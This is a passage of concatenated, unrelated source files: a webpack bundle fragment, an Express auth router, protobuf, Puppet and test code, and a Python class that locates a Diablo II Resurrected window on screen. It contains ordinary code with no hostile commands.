eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! ./reader-form.vue?vue&type=template&id=14c15a6b& */ \"./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\");\n/* harmony import */ var _reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! ./reader-form.vue?vue&type=script&lang=js& */ \"./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\");\n/* empty/unused harmony star reexport *//* harmony import */ var _node_modules_vue_loader_lib_runtime_componentNormalizer_js__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! ../../../../../node_modules/vue-loader/lib/runtime/componentNormalizer.js */ \"./node_modules/vue-loader/lib/runtime/componentNormalizer.js\");\n\n\n\n\n\n/* normalize component */\n\nvar component = Object(_node_modules_vue_loader_lib_runtime_componentNormalizer_js__WEBPACK_IMPORTED_MODULE_2__[\"default\"])(\n _reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_1__[\"default\"],\n _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"render\"],\n _reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"staticRenderFns\"],\n false,\n null,\n null,\n null\n \n)\n\n/* hot reload */\nif (false) { var api; }\ncomponent.options.__file = \"resources/js/pages/admin/reader/reader-form.vue\"\n/* harmony default export */ __webpack_exports__[\"default\"] = (component.exports);//# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT9hZTkzIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQTBGO0FBQzNCO0FBQ0w7OztBQUcxRDtBQUNtRztBQUNuRyxnQkFBZ0IsMkdBQVU7QUFDMUIsRUFBRSxpRkFBTTtBQUNSLEVBQUUsc0ZBQU07QUFDUixFQUFFLCtGQUFlO0FBQ2pCO0FBQ0E7QUFDQTtBQUNBOztBQUVBOztBQUVBO0FBQ0EsSUFBSSxLQUFVLEVBQUUsWUFpQmY7QUFDRDtBQUNlLGdGIiwiZmlsZSI6Ii4vcmVzb3VyY2VzL2pzL3BhZ2VzL2FkbWluL3JlYWRlci9yZWFkZXItZm9ybS52dWUuanMiLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgeyByZW5kZXIsIHN0YXRpY1JlbmRlckZucyB9IGZyb20gXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT10ZW1wbGF0ZSZpZD0xNGMxNWE2YiZcIlxuaW1wb3J0IHNjcmlwdCBmcm9tIFwiLi9yZWFkZXItZm9ybS52dWU/dnVlJnR5cGU9c2NyaXB0Jmxhbmc9anMmXCJcbmV4cG9ydCAqIGZyb20gXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT1zY3JpcHQmbGFuZz1qcyZcIlxuXG5cbi8qIG5vcm1hbGl6ZSBjb21wb25lbnQgKi9cbmltcG9ydCBub3JtYWxpemVyIGZyb20gXCIhLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL3Z1ZS1sb2FkZXIvbGliL3J1bnRpbWUvY29tcG9uZW50Tm9ybWFsaXplci5qc1wiXG52YXIgY29tcG9uZW50ID0gbm9ybWFsaXplcihcbiAgc2NyaXB0LFxuICByZW5kZXIsXG4gIHN0YXRpY1JlbmRlckZucyxcbiAgZmFsc2UsXG4gIG51bGwsXG4gIG51bGwsXG4gIG51bGxcbiAgXG4pXG5cbi8qIGhvdCByZWxvYWQgKi9cbmlmIChtb2R1bGUuaG90KSB7XG4gIHZhciBhcGkgPSByZXF1aXJlKFwiQzpcXFxcbGFyYWdvblxcXFx3d3dcXFxcdGlrLXRvay10YXJvdC1tYXN0ZXJcXFxcbm9kZV9tb2R1bGVzXFxcXHZ1ZS1ob3QtcmVsb2FkLWFwaVxcXFxkaXN0XFxcXGluZGV4LmpzXCIpXG4gIGFwaS5pbnN0YWxsKHJlcXVpcmUoJ3Z1ZScpKVxuICBpZiAoYXBpLmNvbXBhdGlibGUpIHtcbiAgICBtb2R1bGUuaG90LmFjY2VwdCgpXG4gICAgaWYgKCFhcGkuaXNSZWNvcmRlZCgnMTRjMTVhNmInKSkge1xuICAgICAgYXBpLmNyZWF0ZVJlY29yZCgnMTRjMTVhNmInLCBjb21wb25lbnQub3B0aW9ucylcbiAgICB9IGVsc2Uge1xuICAgICAgYXBpLnJlbG9hZCgnMTRjMTVhNmInLCBjb21wb25lbnQub3B0aW9ucylcbiAgICB9XG4gICAgbW9kdWxlLmhvdC5hY2NlcHQoXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT10ZW1wbGF0ZSZpZD0xNGMxNWE2YiZcIiwgZnVuY3Rpb24gKCkge1xuICAgICAgYXBpLnJlcmVuZGVyKCcxNGMxNWE2YicsIHtcbiAgICAgICAgcmVuZGVyOiByZW5kZXIsXG4gICAgICAgIHN0YXRpY1JlbmRlckZuczogc3RhdGljUmVuZGVyRm5zXG4gICAgICB9KVxuICAgIH0pXG4gIH1cbn1cbmNvbXBvbmVudC5vcHRpb25zLl9fZmlsZSA9IFwicmVzb3VyY2VzL2pzL3BhZ2VzL2FkbWluL3JlYWRlci9yZWFkZXItZm9ybS52dWVcIlxuZXhwb3J0IGRlZmF1bHQgY29tcG9uZW50LmV4cG9ydHMiXSwic291cmNlUm9vdCI6IiJ9\n//# sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&":
/*!**********************************************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js& ***!
\**********************************************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _node_modules_babel_loader_lib_index_js_ref_4_0_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! -!../../../../../node_modules/babel-loader/lib??ref--4-0!../../../../../node_modules/vue-loader/lib??vue-loader-options!./reader-form.vue?vue&type=script&lang=js& */ \"./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\");\n/* empty/unused harmony star reexport */ /* harmony default export */ __webpack_exports__[\"default\"] = (_node_modules_babel_loader_lib_index_js_ref_4_0_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_0__[\"default\"]); //# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT81NGY0Il0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQSx3Q0FBdU0sQ0FBZ0IsdVBBQUcsRUFBQyIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9wYWdlcy9hZG1pbi9yZWFkZXIvcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXNjcmlwdCZsYW5nPWpzJi5qcyIsInNvdXJjZXNDb250ZW50IjpbImltcG9ydCBtb2QgZnJvbSBcIi0hLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL2JhYmVsLWxvYWRlci9saWIvaW5kZXguanM/P3JlZi0tNC0wIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy92dWUtbG9hZGVyL2xpYi9pbmRleC5qcz8/dnVlLWxvYWRlci1vcHRpb25zIS4vcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXNjcmlwdCZsYW5nPWpzJlwiOyBleHBvcnQgZGVmYXVsdCBtb2Q7IGV4cG9ydCAqIGZyb20gXCItIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy9iYWJlbC1sb2FkZXIvbGliL2luZGV4LmpzPz9yZWYtLTQtMCEuLi8uLi8uLi8uLi8uLi9ub2RlX21vZHVsZXMvdnVlLWxvYWRlci9saWIvaW5kZXguanM/P3Z1ZS1sb2FkZXItb3B0aW9ucyEuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT1zY3JpcHQmbGFuZz1qcyZcIiJdLCJzb3VyY2VSb290IjoiIn0=\n//# sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&":
/*!****************************************************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b& ***!
\****************************************************************************************/
/*! exports provided: render, staticRenderFns */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! -!../../../../../node_modules/vue-loader/lib/loaders/templateLoader.js??vue-loader-options!../../../../../node_modules/vue-loader/lib??vue-loader-options!./reader-form.vue?vue&type=template&id=14c15a6b& */ \"./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\");\n/* harmony reexport (safe) */ __webpack_require__.d(__webpack_exports__, \"render\", function() { return _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"render\"]; });\n\n/* harmony reexport (safe) */ __webpack_require__.d(__webpack_exports__, \"staticRenderFns\", function() { return _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"staticRenderFns\"]; });\n\n//# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT83ZTMzIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQSIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9wYWdlcy9hZG1pbi9yZWFkZXIvcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXRlbXBsYXRlJmlkPTE0YzE1YTZiJi5qcyIsInNvdXJjZXNDb250ZW50IjpbImV4cG9ydCAqIGZyb20gXCItIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy92dWUtbG9hZGVyL2xpYi9sb2FkZXJzL3RlbXBsYXRlTG9hZGVyLmpzPz92dWUtbG9hZGVyLW9wdGlvbnMhLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL3Z1ZS1sb2FkZXIvbGliL2luZGV4LmpzPz92dWUtbG9hZGVyLW9wdGlvbnMhLi9yZWFkZXItZm9ybS52dWU/dnVlJnR5cGU9dGVtcGxhdGUmaWQ9MTRjMTVhNmImXCIiXSwic291cmNlUm9vdCI6IiJ9\n//# sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\n");
/***/ })
}]); |
# Copyright 2016 Skymind,Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from .ndarray import ndarray
from .java_classes import Nd4j
def zeros(shape):
return ndarray(Nd4j.zeros(*shape))
def ones(shape):
return ndarray(Nd4j.ones(*shape))
|
const router = require('express').Router()
const bcrypt = require('bcryptjs')
const { BCRYPT_ROUNDS, JWT_SECRET } = require('../../config')
const User = require('../auth/auth-model')
const { generateToken } = require('./auth-middleware')
router.post('/register', (req, res, next) => {
let user = req.body
const hash = bcrypt.hashSync(user.password, BCRYPT_ROUNDS)
user.password = hash
User.addUser(user)
.then(saved => {
res.status(201).json({ message: `Welcome, ${saved.username}` })
})
.catch(next)
})
router.post('/login', (req, res, next) => {
let { username, password } = req.body
User.findBy({ username })
.then(([user]) => {
if (user && bcrypt.compareSync(password, user.password)) {
const token = generateToken(user);
res.status(200).json({
message: `Welcome back ${user.username}...`,
token,
})
} else {
next({
status: 401, message: 'Invalid Credentials'
})
}
})
.catch(next)
})
module.exports = router; |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: resource_metric_source.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from monitor_sdk.model.container import metric_target_pb2 as monitor__sdk_dot_model_dot_container_dot_metric__target__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='resource_metric_source.proto',
package='container',
syntax='proto3',
serialized_options=_b('ZCgo.easyops.local/contracts/protorepo-models/easyops/model/container'),
serialized_pb=_b('\n\x1cresource_metric_source.proto\x12\tcontainer\x1a/monitor_sdk/model/container/metric_target.proto\"M\n\x14ResourceMetricSource\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\'\n\x06target\x18\x02 \x01(\x0b\x32\x17.container.MetricTargetBEZCgo.easyops.local/contracts/protorepo-models/easyops/model/containerb\x06proto3')
,
dependencies=[monitor__sdk_dot_model_dot_container_dot_metric__target__pb2.DESCRIPTOR,])
_RESOURCEMETRICSOURCE = _descriptor.Descriptor(
name='ResourceMetricSource',
full_name='container.ResourceMetricSource',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='container.ResourceMetricSource.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='target', full_name='container.ResourceMetricSource.target', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=92,
serialized_end=169,
)
_RESOURCEMETRICSOURCE.fields_by_name['target'].message_type = monitor__sdk_dot_model_dot_container_dot_metric__target__pb2._METRICTARGET
DESCRIPTOR.message_types_by_name['ResourceMetricSource'] = _RESOURCEMETRICSOURCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ResourceMetricSource = _reflection.GeneratedProtocolMessageType('ResourceMetricSource', (_message.Message,), {
'DESCRIPTOR' : _RESOURCEMETRICSOURCE,
'__module__' : 'resource_metric_source_pb2'
# @@protoc_insertion_point(class_scope:container.ResourceMetricSource)
})
_sym_db.RegisterMessage(ResourceMetricSource)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python
from __future__ import print_function
"""
site.pp generator
"""
import os
import sys
import json
import inflect
import argparse
from configparser import SafeConfigParser
debug = False
write_to = sys.stdout
def eprint(*args, **kwargs):
global debug
if debug:
print(*args, file=sys.stderr, **kwargs)
def print_resource(resource_name, resource_alias, strategy='deep'):
global debug, write_to
# lookup( <NAME>, [<VALUE TYPE>], [<MERGE BEHAVIOR>], [<DEFAULT VALUE>] )
print("", file=write_to)
# print("$resource_alias = lookup('"+resource_alias+"', undef, '"+strategy+"', {})", file=write_to)
print("$"+resource_alias+" = lookup("+resource_alias+", Hash, "+strategy+", {})", file=write_to)
# create_resources(postgresql::schema, $postgresschemas)
print("create_resources("+resource_name+", $"+resource_alias+")", file=write_to)
def generatesitepp(config_file, write_sitepp_to=sys.stdout):
global debug, write_to
write_to=write_sitepp_to
config = SafeConfigParser()
config.read(config_file)
try:
debug = config.getboolean('sitegen', 'debug')
except:
debug = False
try:
resource_file = config.get('sitegen', 'resource-file').strip('"').strip("'").strip()
except:
resource_file = "./siteppgen/resource.list"
try:
resource_hash = json.loads(config.get('sitegen','resource-hash'))
except:
resource_hash = {}
try:
deep_include_classes = json.loads(config.get('sitegen','deep-include-classes'))
except:
deep_include_classes = []
# resource_hash
for resource_alias in resource_hash:
# print resource hash
print_resource(resource_hash[resource_alias], resource_alias)
# resource_file
if not os.path.isfile(resource_file):
eprint("WARNING: resource-file ("+resource_file+") not found, ignoring resources")
with open(resource_file) as resource_file_handler:
resource_name = resource_file_handler.readline().rstrip(os.linesep).strip('"').strip("'").strip()
while resource_name:
resource_alias = resource_name.replace(':','').strip()+"s"
print_resource(resource_name, resource_alias)
p = inflect.engine()
plural_resource_alias = p.plural(resource_name.replace(':','').strip())
if plural_resource_alias != resource_alias:
print_resource(resource_name, plural_resource_alias)
resource_name = resource_file_handler.readline().rstrip(os.linesep).strip('"').strip("'").strip()
for resource_alias in config.sections():
if resource_alias!="sitegen":
try:
merge_strategy = config.get(resource_alias, 'merge-strategy').strip('"').strip("'").strip()
except:
merge_strategy = 'deep'
try:
resource_name = config.get(resource_alias, 'resource-name').strip('"').strip("'").strip()
print_resource(resource_name, resource_alias, merge_strategy)
except:
eprint("WARNING: skipping "+resource_alias+": resource-name not found")
# lookup('classes', Array[String], 'deep').include
for deep_include_class in deep_include_classes:
print("", file=write_to)
print("lookup('"+deep_include_class+"', Array[String], 'deep').include", file=write_to)
if __name__ == '__main__':
try:
config_file = sys.argv[1]
except IndexError:
config_file = './siteppgen.config'
generatesitepp(config_file=config_file)
|
'use strict';
var WSDLElement = require('./wsdlElement');
class Documentation extends WSDLElement {
constructor(nsName, attrs, options) {
super(nsName, attrs, options);
}
}
Documentation.elementName = 'documentation';
Documentation.allowedChildren = [];
module.exports = Documentation; |
import { Meteor } from 'meteor/meteor';
import { Tracker } from 'meteor/tracker';
import { settings } from '../../settings';
import { TabBar } from '../../ui-utils';
Meteor.startup(function() {
return Tracker.autorun(function() {
if (settings.get('Message_AllowPinning')) {
TabBar.addButton({
groups: ['channel', 'group', 'direct'],
id: 'pinned-messages',
i18nTitle: 'Pinned_Messages',
icon: 'pin',
template: 'pinnedMessages',
order: 10,
});
} else {
TabBar.removeButton('pinned-messages');
}
});
});
|
def multipliers():
"""
if you will not bind i, then the result will be
The output of the above code will be [6, 6, 6, 6] (not [0, 2, 4, 6])
The reason of it is late binding.
It means that the values of variables used in closures are looked up
at the time the inner function is called.
You can read more here:
Common Gotchas — The Hitchhiker's Guide to Python
https://docs.python-guide.org/writing/gotchas/
"""
return [lambda x, i=i: i * x for i in range(4)]
print([m(2) for m in multipliers()])
|
const name = '';
if (name) {
console.log('We have a name!');
} else {
console.log('No name provided');
} |
'use strict'
var fs = require('fs')
var compiler = require('solc')
var compilerInput = require('remix-solidity').CompilerInput
var defaultVersion = 'v0.5.1+commit.c8a2cb62'
compiler.loadRemoteVersion(defaultVersion, (error, solcSnapshot) => {
if (error) console.log(error)
var compilationResult = {}
gatherCompilationResults('./test-browser/tests/', compilationResult, solcSnapshot)
replaceSolCompiler(compilationResult, solcSnapshot)
})
function gatherCompilationResults (dir, compilationResult, solcSnapshot) {
var filenames = fs.readdirSync(dir, 'utf8')
filenames.map(function (item, i) {
if (item.endsWith('.js')) {
var testDef = require('.' + dir + item)
if ('@sources' in testDef) {
var sources = testDef['@sources']()
for (var files in sources) {
compile(solcSnapshot, sources[files], true, function (result) {
compilationResult[result.key] = result
})
compile(solcSnapshot, sources[files], false, function (result) {
compilationResult[result.key] = result
})
}
}
}
})
return compilationResult
}
function compile (solcSnapshot, source, optimization, addCompilationResult) {
var missingInputs = []
try {
var input = compilerInput(source, {optimize: optimization})
var result = solcSnapshot.compileStandardWrapper(input, function (path) {
missingInputs.push(path)
})
input = input.replace(/(\t)|(\n)|(\\n)|( )/g, '')
} catch (e) {
console.log(e)
}
var ret = {
key: input,
source: source,
optimization: optimization,
missingInputs: missingInputs,
result: result
}
addCompilationResult(ret)
}
function replaceSolCompiler (results, solcSnapshot) {
fs.readFile('./test-browser/mockcompiler/compiler.js', 'utf8', function (error, data) {
if (error) {
console.log(error)
process.exit(1)
return
}
console.log(solcSnapshot.version())
data = data + '\n\nvar mockCompilerVersion = \'' + solcSnapshot.version() + '\''
data = data + '\n\nvar mockData = ' + JSON.stringify(results) + ';\n'
fs.writeFile('./soljson.js', data, 'utf8', function (error) {
if (error) {
console.log(error)
process.exit(1)
return
}
})
})
}
|
export {
// a
foo1,
// b
bar1,
baz1,
} from "mod";
const foo2 = 1;
const bar2 = 1;
const baz2 = 1;
export {
// a
foo2,
// b
bar2,
baz2,
};
|
import unittest
import warnings
import torch
from tqdm import tqdm
from data.utils import get_db_container, get_db_info
from utils import get_dataloader, get_train_val_test_datasets
dataset_names = ('acquirevaluedshopperschallenge',
'homecreditdefaultrisk',
'kddcup2014')
class TestDatabaseDataset(unittest.TestCase):
def test_datapoints_for_no_self_loops_and_nonnegative_edge_types(self):
for db_name in dataset_names:
for dataset in get_train_val_test_datasets(dataset_name=db_name,
train_test_split='use_full_train',
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), ):
for dp_id, (edge_list, node_types, edge_types, features, label) in tqdm(dataset):
# Nodes don't have any self loops in the raw data
for edge in edge_list:
self.assertNotEqual(edge[0], edge[1])
# All edge types are nonnegative in the raw data
self.assertTrue(all(et >= 0 for et in edge_types))
def test_train_val_and_test_splits_contain_different_datapoints(self):
for train_test_split in ['use_full_train', 'xval0', 'xval1', 'xval2', 'xval3', 'xval4']:
for db_name in dataset_names:
train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=db_name,
train_test_split=train_test_split,
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), )
self.assertEqual(0, len(
set(train_data.datapoint_ids).intersection(val_data.datapoint_ids).intersection(
test_data.datapoint_ids)))
class TestDataBaseClass:
class TestData(unittest.TestCase):
db_name = None
def setUp(self):
self.db_info = get_db_info(self.db_name)
batch_size = 1
num_workers = 0
max_nodes_per_graph = 100000
_ = get_db_container(self.db_name)
train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=self.db_name,
train_test_split='use_full_train',
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), )
train_loader = get_dataloader(dataset=train_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
val_loader = get_dataloader(dataset=val_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
test_loader = get_dataloader(dataset=test_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
self.loaders = {'train': train_loader,
'val': val_loader,
'test': test_loader}
def test_loaded_datapoints(self):
label_node_type, label_feature_name = self.db_info['label_feature'].split('.')
for split, loader in self.loaders.items():
with warnings.catch_warnings():
warnings.simplefilter('ignore')
for bdgl, features, label in tqdm(loader):
# No empty graphs
self.assertGreater(bdgl.number_of_nodes(), 0)
# Every edge has an equal and opposite edge with negative edge type
uvt = torch.stack((*bdgl.all_edges('uv', 'eid'), bdgl.edata['edge_types'])).t()
u_v_type = []
v_u_negtype = []
for u, v, type in uvt.tolist():
u_v_type.append((u, v, type))
v_u_negtype.append((v, u, -type))
u_v_type_set = set(u_v_type)
v_u_negtype_set = set(v_u_negtype)
self.assertEqual(uvt.shape[0], len(u_v_type_set)) # Make sure no redundant edges
self.assertEqual(u_v_type_set, v_u_negtype_set)
# Every node gets a self loop after collation
for i in range(bdgl.number_of_nodes()):
self.assertIn((i, i, 0), u_v_type_set)
# Self loops have type 0
for u, v, type in u_v_type:
if u == v:
self.assertEqual(0, type)
# Features have all the right keys and numbers of values
self.assertGreater(len(features.keys()), 0)
for node_type, feats in features.items():
feat_keys = set(feats.keys())
# Ignore the label feature
if node_type == label_node_type:
feat_keys = feat_keys.union([label_feature_name])
self.assertEqual(feat_keys, self.db_info['node_types_and_features'][node_type].keys())
node_type_int = self.db_info['node_type_to_int'][node_type]
n_nodes_this_type = (bdgl.ndata['node_types'] == node_type_int).sum().item()
for feat_vals in feats.values():
self.assertEqual(n_nodes_this_type, feat_vals.shape[0])
# Only test points have labels
if split == 'test':
self.assertIsNone(label)
else:
self.assertIsNotNone(label)
# Label isn't present in features
self.assertNotIn(label_feature_name, features[label_node_type].keys())
def test_null_counts_in_database_are_reasonable_and_match_preprocessed_datapoints(self):
# Count up nulls in preprocessed datapoints
n_null_counts = {}
for split, loader in self.loaders.items():
for _, (_, _, _, features, _) in tqdm(loader.dataset):
for node_type, f in features.items():
n_null_counts.setdefault(node_type, {})
for feature_name, values in f.items():
n_null_counts[node_type].setdefault(feature_name, 0)
n_null_counts[node_type][feature_name] += values.count(None)
# Make sure nulls in preprocessed datapoints match those in db_info
for node_type, features in self.db_info['node_types_and_features'].items():
for feature_name, feature_info in features.items():
# Skip target feature, because it's not in the node features
if self.db_info['label_feature'] == '{}.{}'.format(node_type, feature_name):
continue
self.assertEqual(n_null_counts[node_type][feature_name], feature_info['n_null_values'],
f'node_type: {node_type}, feature_name: {feature_name}')
|
import numpy as np
from mss import mss
import cv2
import time
from logger import Logger
from typing import Tuple
from config import Config
from utils.misc import load_template
import os
class Screen:
"""Grabs images from screen and converts different coordinate systems to each other"""
def __init__(self, monitor: int = 0):
self._sct = mss()
monitor_idx = monitor + 1 # sct saves the whole screen (including both monitors if available at index 0, then monitor 1 at 1 and 2 at 2)
if len(self._sct.monitors) == 1:
Logger.error("How do you not have a monitor connected?!")
os._exit(1)
if monitor_idx >= len(self._sct.monitors):
Logger.warning("Monitor index not available! Choose a smaller number for 'monitor' in the param.ini. Forcing value to 0 for now.")
monitor_idx = 1
self._config = Config()
self._monitor_roi = self._sct.monitors[monitor_idx]
# auto find offests
template = load_template(f"assets/templates/main_menu_top_left.png", 1.0)
template_ingame = load_template(f"assets/templates/window_ingame_offset_reference.png", 1.0)
start = time.time()
found_offsets = False
Logger.info("Searching for window offsets. Make sure D2R is in focus and you are on the hero selection screen")
debug_max_val = 0
while time.time() - start < 20:
img = self.grab()
self._sct = mss()
res = cv2.matchTemplate(img, template, cv2.TM_CCOEFF_NORMED)
res_ingame = cv2.matchTemplate(img, template_ingame, cv2.TM_CCOEFF_NORMED)
_, max_val, _, max_pos = cv2.minMaxLoc(res)
_, max_val_ingame, _, max_pos_ingame = cv2.minMaxLoc(res_ingame)
# We are in game
if max_val_ingame > max_val:
max_val = max_val_ingame
offset_x, offset_y = max_pos_ingame
max_pos = (
offset_x - self._config.ui_pos["ingame_ref_x"],
offset_y - self._config.ui_pos["ingame_ref_y"],
)
# Save max found scores for debug in case it fails
if max_val > debug_max_val:
debug_max_val = max_val
if max_val > 0.84:
if max_val < 0.93:
Logger.warning(f"Your template match score to calc corner was lower then usual ({max_val*100:.1f}% confidence). " +
"You might run into template matching issues along the way!")
offset_left, offset_top = max_pos
Logger.debug(f"Set offsets: left {offset_left}px, top {offset_top}px")
self._monitor_roi["top"] += offset_top
self._monitor_roi["left"] += offset_left
self._monitor_x_range = (self._monitor_roi["left"] + 10, self._monitor_roi["left"] + self._monitor_roi["width"] - 10)
self._monitor_y_range = (self._monitor_roi["top"] + 10, self._monitor_roi["top"] + self._monitor_roi["height"] - 10)
self._monitor_roi["width"] = self._config.ui_pos["screen_width"]
self._monitor_roi["height"] = self._config.ui_pos["screen_height"]
found_offsets = True
break
if not found_offsets:
if self._config.general["info_screenshots"]:
cv2.imwrite("./info_screenshots/error_d2r_window_now_found_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.grab())
Logger.error("Could not find D2R logo at hero selection or template for ingame, shutting down")
